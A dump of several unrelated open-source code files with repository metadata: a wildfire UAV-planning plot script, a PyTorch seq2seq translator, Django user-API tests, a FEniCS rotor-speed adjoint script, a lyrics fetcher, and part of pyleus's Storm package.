fire = propagation.propagate_from_points(env, ignition_points, 180 * 60)
logging.info("End of propagation")
# Configure some flight
base_wp = Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.)
start_t = 120 * 60
uav = UAVConf.x8()
f_confs = [
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind_xy),
]
conf = SAOP_conf(start_t, start_t + uav.max_flight_time)
fire1 = fire.ignitions()
pl = Planner(env, fire1, f_confs, conf)
pl.compute_plan()
sr_1 = pl.search_result
fmapper = FireMapper(env, fire1)
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
frame=(0, 0))
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
# Draw expected fire contour
t_range = (sr_1.final_plan().trajectories()[0].start_time(0) - 120,
sr_1.final_plan().trajectories()[0].end_time(len(
sr_1.final_plan().trajectories()[0]) - 1) + 120)
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.Reds)
# Draw observed fire
executed_path_1 = sr_1.final_plan().trajectories()[0].sampled_with_time(step_size=10)
fmapper.observe(executed_path_1, pl.flights[0].uav)
gdd.draw_ignition_shade(geodata=fmapper.firemap, cmap=matplotlib.cm.summer, with_colorbar=False)
# Draw trajectory
colors = ['blue', 'green', 'magenta']
labels = ["UAV " + str(i) for i in range(len(f_confs))]
for i in range(len(f_confs)):
plot_plan_trajectories(sr_1.final_plan(), gdd, trajectories=i, draw_path=True,
draw_flighttime_path=False, colors=[colors[i]], labels=[labels[i]],
linestyles=['-'])
gdd.legend()
return gdd
def generic_case_figure(wind_speed=5.,
wind_dir=np.pi / 2) -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a generic case with wind, multiple UAV from multiple bases, and multiple fire."""
# Geographic environment (elevation, landcover, wind...)
wind = (wind_speed, wind_dir)
area = ((480000.0, 485000.0), (6210000.0, 6215000.0))
env = PlanningEnvironment(area, wind_speed=wind[0], wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
# Fire applied to the previous environment
ignition_points = [
TimedPoint(area[0][0] + 1000.0, area[1][0] + 1000.0, 0.),
TimedPoint(area[0][0] + 4000.0, area[1][0] + 3000.0, 0.)
]
logging.info("Start of propagation")
fire = propagation.propagate_from_points(env, ignition_points, 120 * 60)
logging.info("End of propagation")
# Configure some flight
start_t = 90 * 60
uav = UAVConf.x8()
uav.max_flight_time/=5
f_confs = [
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind),
FlightConf(uav, start_t, Waypoint(area[0][1] - 100., area[1][0] + 1000., 0., 0.), None,
wind),
]
conf = SAOP_conf(start_t, start_t + uav.max_flight_time)
fire1 = fire.ignitions()
pl = Planner(env, fire1, f_confs, conf)
pl.compute_plan()
sr_1 = pl.search_result
fmapper = FireMapper(env, fire1)
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
frame=(0, 0))
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
# Draw expected fire contour
t_range = (sr_1.final_plan().trajectories()[0].start_time(0) - 120,
sr_1.final_plan().trajectories()[0].end_time(len(
sr_1.final_plan().trajectories()[0]) - 1) + 120)
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.Reds)
# Draw observed fire
for i in range(len(f_confs)):
executed_path = sr_1.final_plan().trajectories()[i].sampled_with_time(step_size=10)
fmapper.observe(executed_path, pl.flights[i].uav)
gdd.draw_ignition_shade(geodata=fmapper.firemap, cmap=matplotlib.cm.summer,
vmin=t_range[0], vmax=t_range[1], with_colorbar=False)
# Draw trajectory
colors = ['blue', 'green', 'magenta']
labels = ["UAV " + str(i) for i in range(len(f_confs))]
for i in range(len(f_confs)):
plot_plan_trajectories(sr_1.final_plan(), gdd, trajectories=i, draw_path=True,
draw_flighttime_path=False, colors=[colors[i]], labels=[labels[i]],
linestyles=['-'])
gdd.legend()
return gdd
def threefire_twouav_figure(wind_speed=5.,
wind_dir=np.pi / 2) -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a generic case with wind, multiple UAV from multiple bases, and multiple fire."""
# Geographic environment (elevation, landcover, wind...)
wind = (wind_speed, wind_dir)
area = ((480000.0, 485000.0), (6210000.0, 6215000.0))
env = PlanningEnvironment(area, wind_speed=wind[0], wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
# Fire applied to the previous environment
ignition_points = [
TimedPoint(area[0][0] + 1000.0, area[1][0] + 1000.0, 0.),
TimedPoint(area[0][0] + 4000.0, area[1][0] + 2000.0, 0.),
TimedPoint(area[0][0] + 2000.0, area[1][0] + 3500.0, 0.)
]
logging.info("Start of propagation")
fire = propagation.propagate_from_points(env, ignition_points, 120 * 60)
logging.info("End of propagation")
# Configure some flight
start_t = 90 * 60
uav = UAVConf.x8()
uav.max_flight_time /= 3
f_confs = [
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind),
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind),
]
conf = SAOP_conf(start_t, start_t + uav.max_flight_time)
fire1 = fire.ignitions()
pl = Planner(env, fire1, f_confs, conf)
pl.compute_plan()
sr_1 = pl.search_result
fmapper = FireMapper(env, fire1)
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
frame=(0, 0))
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
# Draw expected fire contour
t_range = (sr_1.final_plan().trajectories()[0].start_time(0),
sr_1.final_plan().trajectories()[0].end_time(len(
sr_1.final_plan().trajectories()[0]) - 1))
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.Reds,
alpha=1)
# Draw observed fire
for i in range(len(f_confs)):
executed_path = sr_1.final_plan().trajectories()[i].sampled_with_time(step_size=10)
fmapper.observe(executed_path, pl.flights[i].uav)
gdd.draw_ignition_shade(geodata=fmapper.firemap, cmap=matplotlib.cm.summer,
vmin=t_range[0], vmax=t_range[1], with_colorbar=False)
# Draw trajectory
colors = ['blue', 'darkgreen', 'magenta']
labels = ["UAV " + str(i) for i in range(len(f_confs))]
for i in range(len(f_confs)):
plot_plan_trajectories(sr_1.final_plan(), gdd, trajectories=i, draw_path=True,
draw_flighttime_path=False, colors=[colors[i]], labels=[labels[i]],
linestyles=['-'])
gdd.legend()
return gdd
def show(gdd, i):
gdd.figure.set_size_inches(6, 4.5)
gdd.figure.show()
def archive(gdd, i):
gdd.figure.set_size_inches(6, 4.5)
gdd.figure.savefig("result_" + str(i) + ".pdf", dpi=300, bbox_inches='tight')
gdd.figure.savefig("result_" + str(i) + ".eps", dpi=300, bbox_inches='tight')
gdd.figure.savefig("result_" + str(i) + ".svg", dpi=300, bbox_inches='tight')
if __name__ == '__main__':
# input("Press any key...")
matplotlib.rcParams['font.family'] = 'sans-serif'
matplotlib.rcParams['text.usetex'] = True
#
# f1 = singleuav_case_figure()
# show(f1, 1)
# archive(f1, 1)
#
f2 = generic_case_figure()
show(f2, 2 )
# archive(f2, 2)
#
# f3 = singleuav_case_figure(wind_speed=2., wind_dir=np.pi/2)
# archive(f3, 3)
#
# f4 = detail_case_figure()
# show(f4, 4)
# archive(f4, 4)
#
# f5 = wp_insertion()
# show(f5, "wp_insertion")
# archive(f5, "wp_insertion")
# f6 = twofire_threeuav_figure(wind_speed=2., wind_dir=np.pi/2)
# show(f6, "twofire_threeuav")
# archive(f6, "twofire_threeuav")
f7 = threefire_twouav_figure()
show(f7, "threefire_twouav")
archive(f7, "threefire_twouav")
print("eee")
| 39.93018
| 109
| 0.626939
|
420a219bef785cb6ad220b8079a251a612d00fbe
| 6,542
|
py
|
Python
|
seq2seqmodel.py
|
privateai-group1/SEAL
|
4422aee7c0b35a7048ce998e31f373755c099444
|
[
"MIT"
] | 3
|
2020-01-27T11:58:30.000Z
|
2022-02-14T14:57:43.000Z
|
seq2seqmodel.py
|
privateai-group1/SEAL
|
4422aee7c0b35a7048ce998e31f373755c099444
|
[
"MIT"
] | null | null | null |
seq2seqmodel.py
|
privateai-group1/SEAL
|
4422aee7c0b35a7048ce998e31f373755c099444
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.optim as optim
from torchtext.datasets import TranslationDataset, Multi30k
from torchtext.data import Field, BucketIterator
import spacy
import numpy as np
import random
import math
import time
spacy_de = spacy.load('de')
spacy_en = spacy.load('en')
def tokenize_de(text):
return [tok.text for tok in spacy_de.tokenizer(text)][::-1]
def tokenize_en(text):
return [tok.text for tok in spacy_en.tokenizer(text)]
SRC = Field(tokenize = tokenize_de,
init_token = '<sos>',
eos_token = '<eos>',
lower = True)
TRG = Field(tokenize = tokenize_en,
init_token = '<sos>',
eos_token = '<eos>',
lower = True)
from torchtext import datasets
train_data, valid_data, test_data = datasets.Multi30k.splits(exts=('.de', '.en'), fields=(SRC, TRG))
SRC.build_vocab(train_data, min_freq = 2)
TRG.build_vocab(train_data, min_freq = 2)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
BATCH_SIZE = 128
train_iterator, valid_iterator, test_iterator = BucketIterator.splits(
(train_data, valid_data, test_data),
batch_size = BATCH_SIZE,
device = device)
class Encoder(nn.Module):
def __init__(self, input_dim, emb_dim, hid_dim, n_layers, dropout):
super().__init__()
self.hid_dim = hid_dim
self.n_layers = n_layers
self.embedding = nn.Embedding(input_dim, emb_dim)
self.rnn = nn.LSTM(emb_dim, hid_dim, n_layers, dropout = dropout)
self.dropout = nn.Dropout(dropout)
def forward(self, src):
embedded = self.dropout(self.embedding(src))
outputs, (hidden, cell) = self.rnn(embedded)
return hidden, cell
class Decoder(nn.Module):
def __init__(self, output_dim, emb_dim, hid_dim, n_layers, dropout):
super().__init__()
self.output_dim = output_dim
self.hid_dim = hid_dim
self.n_layers = n_layers
self.embedding = nn.Embedding(output_dim, emb_dim)
self.rnn = nn.LSTM(emb_dim, hid_dim, n_layers, dropout = dropout)
self.fc_out = nn.Linear(hid_dim, output_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, input, hidden, cell):
input = input.unsqueeze(0)
embedded = self.dropout(self.embedding(input))
output, (hidden, cell) = self.rnn(embedded, (hidden, cell))
prediction = self.fc_out(output.squeeze(0))
return prediction, hidden, cell
class Seq2Seq(nn.Module):
def __init__(self, encoder, decoder, device):
super().__init__()
self.encoder = encoder
self.decoder = decoder
self.device = device
def forward(self, src, trg, teacher_forcing_ratio = 0.5):
batch_size = trg.shape[1]
trg_len = trg.shape[0]
trg_vocab_size = self.decoder.output_dim
outputs = torch.zeros(trg_len, batch_size, trg_vocab_size).to(self.device)
hidden, cell = self.encoder(src)
input = trg[0,:]
for t in range(1, trg_len):
output, hidden, cell = self.decoder(input, hidden, cell)
outputs[t] = output
teacher_force = random.random() < teacher_forcing_ratio
top1 = output.argmax(1)
input = trg[t] if teacher_force else top1
return outputs
INPUT_DIM = len(SRC.vocab)
OUTPUT_DIM = len(TRG.vocab)
ENC_EMB_DIM = 400
DEC_EMB_DIM = 400
HID_DIM = 400
N_LAYERS = 2
ENC_DROPOUT = 0.5
DEC_DROPOUT = 0.5
enc = Encoder(INPUT_DIM, ENC_EMB_DIM, HID_DIM, N_LAYERS, ENC_DROPOUT)
dec = Decoder(OUTPUT_DIM, DEC_EMB_DIM, HID_DIM, N_LAYERS, DEC_DROPOUT)
model = Seq2Seq(enc, dec, device).to(device)
def init_weights(m):
for name, param in m.named_parameters():
nn.init.uniform_(param.data, -0.08, 0.08)
model.apply(init_weights)
optimizer = optim.Adam(model.parameters())
TRG_PAD_IDX = TRG.vocab.stoi[TRG.pad_token]
criterion = nn.CrossEntropyLoss(ignore_index = TRG_PAD_IDX)
def train(model, iterator, optimizer, criterion, clip):
model.train()
epoch_loss = 0
for i, batch in enumerate(iterator):
src = batch.src
trg = batch.trg
optimizer.zero_grad()
output = model(src, trg)
output_dim = output.shape[-1]
output = output[1:].view(-1, output_dim)
trg = trg[1:].view(-1)
loss = criterion(output, trg)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
epoch_loss += loss.item()
return epoch_loss / len(iterator)
def evaluate(model, iterator, criterion):
model.eval()
epoch_loss = 0
with torch.no_grad():
for i, batch in enumerate(iterator):
src = batch.src
trg = batch.trg
output = model(src, trg, 0) #turn off teacher forcing
output_dim = output.shape[-1]
output = output[1:].view(-1, output_dim)
trg = trg[1:].view(-1)
loss = criterion(output, trg)
epoch_loss += loss.item()
return epoch_loss / len(iterator)
N_EPOCHS = 10
CLIP = 1
best_valid_loss = float('inf')
for epoch in range(N_EPOCHS):
start_time = time.time()
train_loss = train(model, train_iterator, optimizer, criterion, CLIP)
valid_loss = evaluate(model, valid_iterator, criterion)
end_time = time.time()
if valid_loss < best_valid_loss:
best_valid_loss = valid_loss
print(f'\tTrain Loss: {train_loss:.3f} | Train PPL: {math.exp(train_loss):7.3f}')
print(f'\t Val. Loss: {valid_loss:.3f} | Val. PPL: {math.exp(valid_loss):7.3f}')
BATCH_SIZE = 10
_, _, test_it= BucketIterator.splits(
(train_data, valid_data, test_data),
batch_size = BATCH_SIZE,
device = device)
x = (next(iter(test_it)))
src = x.src
trg = x.trg
src_n = src.cpu().numpy()
trg_n = trg.cpu().numpy()
output = model(src, trg, 0)
preds = (output.max(2)[1]).cpu().numpy()
for o in range(10):
print('-------------------------------------------------')
print(' '.join([SRC.vocab.itos[o] for o in src_n[:,o] ]))
print(' '.join([TRG.vocab.itos[o] for o in trg_n[:,o] ]))
print(' '.join([TRG.vocab.itos[o] for o in preds[:,o] ]))
| 30.287037
| 100
| 0.606237
|
ca4f5c9f036a0f5fa3b0a338d8377d92c37d1b5f
| 5,721
|
py
|
Python
|
app/user/tests/test_user_api.py
|
zybex86/reicpe-app-api
|
3b4dbc93b7c1e97e1fba96da2c5f1e3534da030a
|
[
"MIT"
] | null | null | null |
app/user/tests/test_user_api.py
|
zybex86/reicpe-app-api
|
3b4dbc93b7c1e97e1fba96da2c5f1e3534da030a
|
[
"MIT"
] | null | null | null |
app/user/tests/test_user_api.py
|
zybex86/reicpe-app-api
|
3b4dbc93b7c1e97e1fba96da2c5f1e3534da030a
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
return get_user_model().objects.create_user(**params)
class PublicUserApiTests(TestCase):
""" Test the users API (public) """
def setUp(self):
self.client = APIClient()
def test_create_valid_user_success(self):
"""
Test creating user with valid payload is successful
"""
payload = {
'email': 'test@test.com',
'password': 'testtest',
'name': 'Test name'
}
response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**response.data)
self.assertTrue(user.check_password(payload['password']))
self.assertNotIn('password', response.data)
def test_user_exists(self):
"""
Test creating a user that already exists fails
"""
payload = {
'email': 'test@test.pl',
'password': 'testing123'
}
create_user(**payload)
response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
"""
Test that password must be more than 5 character
"""
payload = {
'email': 'test@testo.com',
'password': '123'
}
response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
user_exists = get_user_model().objects.filter(
email=payload['email']
).exists()
self.assertFalse(user_exists)
def test_create_token_for_user(self):
""" Test that a token is created for the user """
payload = {'email': 'test@test.com', 'password': 'testpass'}
create_user(**payload)
response = self.client.post(TOKEN_URL, payload)
self.assertIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
"""
Test that token is not created if invalid credentials are given
"""
create_user(email='test@test.com', password='testpass')
payload = {'email': 'test@test.com', 'password': 'wrong'}
response = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
"""
Test that token is not created if user doesn't exist
"""
payload = {'email': 'test@test.com', 'password': 'wrong'}
response = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_fields(self):
""" Test that email and password is required """
response = self.client.post(
TOKEN_URL,
{'email': 'one', 'password': ''}
)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.post(
TOKEN_URL,
{'email': '', 'password': 'wrong'}
)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.post(
TOKEN_URL,
{'email': '', 'password': ''}
)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorised(self):
"""
Test that authentication is required for users
"""
response = self.client.get(ME_URL)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUsersApiTests(TestCase):
""" Test API requests that require authentication """
def setUp(self):
self.user = create_user(
email='test@test.com',
password='password',
name='name'
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_success(self):
"""
Test retrieving profile for logged user
"""
response = self.client.get(ME_URL)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, {
'name': self.user.name,
'email': self.user.email
})
def test_post_me_not_allowed(self):
""" Test that POST is not allowed on the me url """
response = self.client.post(ME_URL)
self.assertEqual(
response.status_code,
status.HTTP_405_METHOD_NOT_ALLOWED
)
def test_update_user_profile(self):
"""
Test updating the user profile for authenticated user
"""
payload = {'name': 'new name', 'password': 'newpass'}
response = self.client.patch(ME_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
self.assertEqual(response.status_code, status.HTTP_200_OK)
| 30.593583
| 76
| 0.626289
|
ba43791eb39934c6cbd95d2f65426b50044f8684
| 7,106
|
py
|
Python
|
tools/rotorspeed_v2.py
|
TUDelft-DataDrivenControl/FRED
|
f837f4a126e693519fa5ab7c913cb26570ca5278
|
[
"MIT"
] | null | null | null |
tools/rotorspeed_v2.py
|
TUDelft-DataDrivenControl/FRED
|
f837f4a126e693519fa5ab7c913cb26570ca5278
|
[
"MIT"
] | null | null | null |
tools/rotorspeed_v2.py
|
TUDelft-DataDrivenControl/FRED
|
f837f4a126e693519fa5ab7c913cb26570ca5278
|
[
"MIT"
] | null | null | null |
from fenics import *
from fenics_adjoint import *
import numpy as np
from pyadjoint import Block
from pyadjoint.overloaded_function import overload_function
import scipy.interpolate
def read_rosco_curves():
filename = "Cp_Ct_Cq.DTU10MW.txt"
with open(filename, "r") as f:
datafile = f.readlines()
for idx in range(len(datafile)):
if "Pitch angle" in datafile[idx]:
pitch_array = np.loadtxt(filename, skiprows=idx + 1, max_rows=1)
if "TSR vector" in datafile[idx]:
tsr_array = np.loadtxt(filename, skiprows=idx + 1, max_rows=1)
if "Wind speed" in datafile[idx]:
wind_speed = np.loadtxt(filename, skiprows=idx + 1, max_rows=1)
if "Power coefficient" in datafile[idx]:
cp_array = np.loadtxt(filename, skiprows=idx + 2, max_rows=len(tsr_array))
if "Thrust coefficient" in datafile[idx]:
ct_array = np.loadtxt(filename, skiprows=idx + 2, max_rows=len(tsr_array))
if "Torque coefficent" in datafile[idx]:
cq_array = np.loadtxt(filename, skiprows=idx + 2, max_rows=len(tsr_array))
pitch_grid, tsr_grid = np.meshgrid(pitch_array, tsr_array)
return pitch_grid, tsr_grid, ct_array, cp_array
def lookup_field(pitch_grid, tsr_grid, ct_array, cp_array):
# construct function space
sw_corner = Point(np.min(pitch_grid), np.min(tsr_grid))
ne_corner = Point(np.max(pitch_grid), np.max(tsr_grid))
(n_tsr, n_pitch) = pitch_grid.shape
# set function in function space
m = RectangleMesh(sw_corner, ne_corner, n_pitch + 1, n_tsr + 1)
fe = FiniteElement("Lagrange", m.ufl_cell(), 1)
fs = FunctionSpace(m, fe)
# assign values to function
dof_coords = fs.tabulate_dof_coordinates()
ct = Function(fs)
ct_interp = scipy.interpolate.interp2d(pitch_grid[0, :], tsr_grid[:, 0], ct_array, kind='linear')
ct_values = ct.vector().get_local()
cp = Function(fs)
cp_interp = scipy.interpolate.interp2d(pitch_grid[0, :], tsr_grid[:, 0], cp_array, kind='linear')
cp_values = cp.vector().get_local()
# logger.warning("Limiting 0<=ct<=1 for axial induction calculations")
for idx in range(len(dof_coords)):
pitch, tsr = dof_coords[idx]
ct_values[idx] = np.min((np.max((ct_interp(pitch, tsr), 0.)), 1.))
cp_values[idx] = np.min((np.max((cp_interp(pitch, tsr), 0.)), 1.))
a = 0.5 - 0.5 * (np.sqrt(1 - ct_values[idx]))
# convert to local
ct_values[idx] = ct_values[idx] / (1 - a)
cp_values[idx] = cp_values[idx] / (1 - a) ** 2
ct.vector().set_local(ct_values)
cp.vector().set_local(cp_values)
# write ct and cp field to output file for visual inspection
# ct_file = File("ct.pvd")
# cp_file = File("cp.pvd")
# ct_file.write(ct)
# cp_file.write(cp)
return ct, cp
def get_coefficient(func, coord1, coord2, gradient=False, grad_idx=None):
return func(coord1, coord2)
backend_get_coefficient = get_coefficient
class CoefficientBlock(Block):
def __init__(self, func, coord1, coord2, **kwargs):
super(CoefficientBlock, self).__init__()
self.kwargs = kwargs
self.func = func
self.add_dependency(coord1)
self.add_dependency(coord2)
degree = func.function_space().ufl_element().degree()
family = func.function_space().ufl_element().family()
mesh = func.function_space().mesh()
if np.isin(family, ["CG", "Lagrange"]):
self.V = FunctionSpace(mesh, "DG", degree - 1)
else:
raise NotImplementedError(
"Not implemented for other elements than Lagrange")
def __str__(self):
return "CoefficientBlock"
def evaluate_adj_component(self, inputs, adj_inputs, block_variable, idx, prepared=None):
grad_idx = project(self.func.dx(idx), self.V)
return grad_idx(inputs[0], inputs[1]) * adj_inputs[0]
def recompute_component(self, inputs, block_variable, idx, prepared):
return backend_get_coefficient(self.func, inputs[0], inputs[1])
get_coefficient = overload_function(get_coefficient, CoefficientBlock)
# mesh = UnitSquareMesh(10, 10)
# V0 = FunctionSpace(mesh, "DG", 0)
# V1 = FunctionSpace(mesh, "Lagrange", 1)
#
# u = Function(V1)
# x = SpatialCoordinate(u)
# z = project(x[0]*x[1], V1)
pitch_grid, tsr_grid, ct_array, cp_array = read_rosco_curves()
ct, cp = lookup_field(pitch_grid, tsr_grid, ct_array, cp_array)
time_step = Constant(1.0)
inertia = Constant(5)
radius = Constant(90.)
pa = Constant(10.5)
wk0 = Constant(0.54)
q = Constant(1.2)
rotor_speed = Expression("(dt/J)*(pa/wk - q) + wk",
dt=time_step,
J=inertia,
pa=pa,
wk=wk0,
q=q,
degree=1)
rotor_speed_d_wk = Expression("-(dt/J)*(pa/(wk*wk)) + 1.",
dt=time_step,
J=inertia,
pa=pa,
wk=wk0,
q=q,
degree=1)
rotor_speed_d_pa = Expression("(dt/(J*wk))",
dt=time_step,
J=inertia,
# pa=pa,
wk=wk0,
# q=q,
degree=1)
rotor_speed_d_q = Expression("-(dt/J)",
dt=time_step,
J=inertia,
degree=1)
rotor_speed.dependencies = [wk0, pa, q]
rotor_speed.user_defined_derivatives = {wk0: rotor_speed_d_wk,
pa: rotor_speed_d_pa,
q: rotor_speed_d_q}
wind_speed = Constant(35.)
tip_speed_ratio = rotor_speed * radius / wind_speed
# new_rotor_speed = update_rotor_speed(pa, wk0, q)
print("define J")
# J = assemble(rotor_speed * dx(UnitIntervalMesh(1)))
# print("J: {:.3f}".format(float(J)))
print("define control")
b = Constant(np.random.rand())
controls = [wk0, pa, q, b]
# [c.assign(np.random.rand()) for c in controls]
# J = assemble(rotor_speed * dx(UnitIntervalMesh(1)))
# J = assemble(tip_speed_ratio**2 *dx(UnitIntervalMesh(1)))
tsr = assemble(tip_speed_ratio*dx(UnitIntervalMesh(1)))
ctp = get_coefficient(ct, b, tsr)
# J = assemble(ct**2 *dx(UnitIntervalMesh(1)))
print(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
print(ctp)
print(tsr)
# wk0.assign(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
# rotor_speed.wk.assign(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
# pa.assign(Constant(np.random.rand()+5.))
wk0.assign(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
tsr = assemble(tip_speed_ratio*dx(UnitIntervalMesh(1)))
ctpn = get_coefficient(ct, b, tsr)
print(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
print(ctpn)
print(tsr)
J = ctpn**2
m = [Control(c) for c in controls]
h = [Constant(0.01 * np.random.rand()) for c in controls]
print("reduced functional")
Jh = ReducedFunctional(J, m)
print("taylor test")
taylor_test(Jh, controls, h)
# tape = get_working_tape()
# tape.visualise()
| 34.663415
| 101
| 0.621024
|
d27e21d645c4965ab93c46117caf11da2cb05560
| 1,439
|
py
|
Python
|
demo.py
|
sychen/initialize-virtualenv
|
bcd6950fe2b43c73a156e8d3c4e0f732eacb63de
|
[
"Apache-2.0"
] | null | null | null |
demo.py
|
sychen/initialize-virtualenv
|
bcd6950fe2b43c73a156e8d3c4e0f732eacb63de
|
[
"Apache-2.0"
] | null | null | null |
demo.py
|
sychen/initialize-virtualenv
|
bcd6950fe2b43c73a156e8d3c4e0f732eacb63de
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
import sys
import os
import collections
import json
import inspect
import time
import getpass
import re
import datetime
import argparse
def get_script_directory():
return os.path.realpath(
os.path.dirname(
inspect.getfile(
get_script_directory)))
def change_python_intepreter():
script_directory = get_script_directory()
environment = os.path.join(script_directory, 'environment')
print('environment:', environment)
# If the flow will do `git clean` every time,
# it's better to create the virtualenv outside the git repository;
# otherwise you will need to create it every time.
if not os.path.exists(environment):
print("Virtualenv is not found, initializing")
os.system(os.path.join(script_directory, 'initialize-virtualenv'))
print("Relaunching from virtualenv")
path_of_python = os.path.join(environment, 'bin', 'python')
print('path_of_python:', path_of_python)
os.execv(path_of_python, [path_of_python] + sys.argv)
try:
import requests
from jinja2 import Environment, FileSystemLoader
from jira import JIRA
from flask import Flask, render_template
import ntplib
import markdown
except Exception as e:
print(e)
print("Trigger virtualenv initialization")
change_python_intepreter()
if __name__ == "__main__":
pass
| 22.138462
| 74
| 0.715775
|
248581488ed2fad0f1f2cfa0461d5313ae502a33
| 1,349
|
py
|
Python
|
wiki_to_text.py
|
ITNano/WikiSubtitleReader
|
d9816a452f74f6d70e147eba688838d3b97189d5
|
[
"Apache-2.0"
] | 1
|
2019-01-20T14:46:16.000Z
|
2019-01-20T14:46:16.000Z
|
wiki_to_text.py
|
ITNano/WikiSubtitleReader
|
d9816a452f74f6d70e147eba688838d3b97189d5
|
[
"Apache-2.0"
] | 4
|
2016-08-08T06:56:46.000Z
|
2016-09-26T13:30:14.000Z
|
wiki_to_text.py
|
ITNano/WikiSubtitleReader
|
d9816a452f74f6d70e147eba688838d3b97189d5
|
[
"Apache-2.0"
] | 1
|
2018-08-11T08:01:56.000Z
|
2018-08-11T08:01:56.000Z
|
# -*- coding: utf-8 -*-
from raw_to_ass import Raw_to_ass_parser
import os.path #exists
import sys #exit and argv
import codecs #to write utf-8 output
import kuplett_parser
import diff_tool
from meta_parser import get_metadata
from preprocess import preprocess_ass
def wiki_to_text(username,password,outputdir,sourcefile):
lyrics=kuplett_parser.get_all_lyrics(sourcefile, username, password);
data = kuplett_parser.load_data(sourcefile)
counter = 0
for lyric in lyrics:
filename = outputdir + "/" + kuplett_parser.get_generic_name(data.get("urls")[counter])
counter += 1
if len(os.path.dirname(filename).strip()) > 0 and not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
outfile = codecs.open(filename, 'w', 'utf-8')
for line in lyric:
outfile.write(line+"\n")
return lyrics
if __name__ == "__main__":
if len(sys.argv)<4:
print("Need 3 arguments.")
print("Usage:")
print("get_and_parse_kuplett.py USERNAME PASSWORD OUTFILE_NAME")
sys.exit(3)
#if os.path.exists(sys.argv[3]):
# print("File '"+sys.argv[3]+"' already exists. Delete or rename it and try again.")
# sys.exit(1)
wiki_to_text(sys.argv[1], sys.argv[2], sys.argv[3],sourcefile="data_2017.txt")
| 34.589744
| 104
| 0.670126
|
6b906e2ed1025b67f37aabace63ecee4a3ab4ef4
| 1,671
|
py
|
Python
|
pyleus/storm/__init__.py
|
poros/pyleus
|
41fdb9f5808a824a58c89b8e9cf667de4948f2b7
|
[
"Apache-2.0"
] | null | null | null |
pyleus/storm/__init__.py
|
poros/pyleus
|
41fdb9f5808a824a58c89b8e9cf667de4948f2b7
|
[
"Apache-2.0"
] | null | null | null |
pyleus/storm/__init__.py
|
poros/pyleus
|
41fdb9f5808a824a58c89b8e9cf667de4948f2b7
|
[
"Apache-2.0"
] | null | null | null |
"""Package containing pyleus implementation of major Storm entities.
"""
from __future__ import absolute_import
from collections import namedtuple
DEFAULT_STREAM = "default"
StormTuple = namedtuple('StormTuple', "id comp stream task values")
"""Namedtuple representing a Storm tuple.
* **id**\(``str`` or ``long``): tuple identifier
* **comp**\(``str``): name of the emitting component
* **stream**\(``str``): name of the input stream the tuple belongs to
* **values**\(``tuple``): values contained by the tuple
"""
def is_tick(tup):
"""Tell whether the tuple is a tick tuple or not.
:param tup: tuple to investigate
:type tup: :class:`~.StormTuple`
